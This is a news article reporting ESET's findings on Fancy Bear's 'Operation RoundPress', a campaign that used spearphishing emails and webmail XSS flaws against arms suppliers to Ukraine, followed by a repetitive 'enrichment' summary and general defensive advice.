Skip to content
CybersecurityPoliticstechnologyWar-and-conflictsGeneral-news

Malicious cyber actors focus on penetrating Ukrainian weapons vendors

Cybercriminals Conduct Attacks on Ukrainian Weapons Manufacturers

 and  Administrator
3 min read
Hackers affiliated with the famed Russian group Fancy Bear strike defense companies, suppliers of...
Hackers affiliated with the famed Russian group Fancy Bear strike defense companies, suppliers of arms to Ukraine, as evidenced by recent reports and digital evidence.

Russian Hackers Launching Cyberattacks on Ukraine's Arms Suppliers: What You Need to Know

Cybercriminals Attack Ukrainian Weapons Vendors - Malicious cyber actors focus on penetrating Ukrainian weapons vendors

Get the lowdown on Fancy Bear, a notorious Russian hacker group, and their latest targeted attacks against arms companies supplying weapons to Ukraine.

Targeting Arms Suppliers

Fancy Bear, also known as Sednit or APT28, is on a mission. According to a recent study by Slovak security firm Eset, this hacker group has been launching attacks against manufacturers of Soviet-era weaponry in Bulgaria, Romania, and Ukraine. Surprisingly, arms factories in Africa and South America have also been affected. The primary objective? To disrupt the defense against Russia's invasion.

Operation RoundPress

The current espionage campaign, dubbed "Operation RoundPress," is a prime example of Fancy Bear's cunning tactics. In this campaign, hackers have been exploiting vulnerabilities in widely-used webmail software like Roundcube, Zimbra, Horde, and MDaemon. Many of these vulnerabilities could have been patched with proper software maintenance. Unfortunately, in some cases, attackers have used previously unknown vulnerabilities that couldn't be initially patched.

Phishing Emails & Malware

The attacks typically begin with manipulated emails disguised as news articles from seemingly legitimate sources like the Kyiv Post or Bulgarian news portal News.bg. Once the email is opened in the browser, hidden malware is triggered, bypassing spam filters.

Bypassing Two-Factor Authentication

According to Eset researchers, the malware "SpyPress.MDAEMON" can not only read login credentials and track emails but can also bypass two-factor authentication. This second form of verification adds an extra layer of security for logging into online accounts or accessing sensitive data, but Fancy Bear has managed to bypass it in several cases, gaining persistent access to mailboxes through application passwords.

In conclusion, Fancy Bear is a formidable adversary in the world of cyber espionage. By exploiting both technical vulnerabilities and social engineering tactics like spearphishing and cross-site scripting, they are masterminds at information theft. Keep your software up-to-date and beware of suspicious emails to protect yourself from falling victim to Fancy Bear's cunning moves.

Enrichment Data Insights:

  1. Spearphishing and XSS Vulnerabilities: Fancy Bear leverages spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities to inject malicious JavaScript code into the webmail pages of targeted organizations.
  2. Exploited Software: Fancy Bear has targeted popular webmail software including Roundcube, Horde, MDaemon, and Zimbra, often exploiting known vulnerabilities with available patches, and in some cases, using zero-day vulnerabilities.
  3. Appearance of Legitimacy: Phishing emails often masquerade as legitimate news reports from reputable sources to bypass spam filters.
  4. Data Exfiltration: Once the email clients are compromised, Fancy Bear deploys a custom JavaScript payload to steal sensitive data, including login credentials, address book contacts, and message history.
  5. 2FA Exfiltration: In some cases, attackers have managed to exfiltrate two-factor authentication information, potentially allowing them to bypass two-factor authentication (2FA) if the stolen credentials are used before the 2FA codes expire. However, the malware is not persistent and relies on the victim reopening the malicious email to reload the attack.
  6. The ongoing cyber espionage campaign, Operation RoundPress, is a testament to Fancy Bear's skilful use of spearphishing and cross-site scripting (XSS) vulnerabilities, as they manipulate emails to appear as news articles from credible sources and inject malicious JavaScript code into webmail pages.
  7. In the battle against Fancy Bear, it's crucial to keep a sharp eye on popular webmail software like Roundcube, Horde, MDaemon, and Zimbra, as the hacker group has shown a propensity for exploiting both known vulnerabilities with available patches and zero-day vulnerabilities.
  8. In the realm of cyber war-and-conflicts, it's essential to stay vigilant against phishing emails that seem harmless but carry the potential to bypass spam filters and compromise your systems, as seen in the attacks against arms suppliers in various EC countries and beyond.

Read also:

    Related

    Latest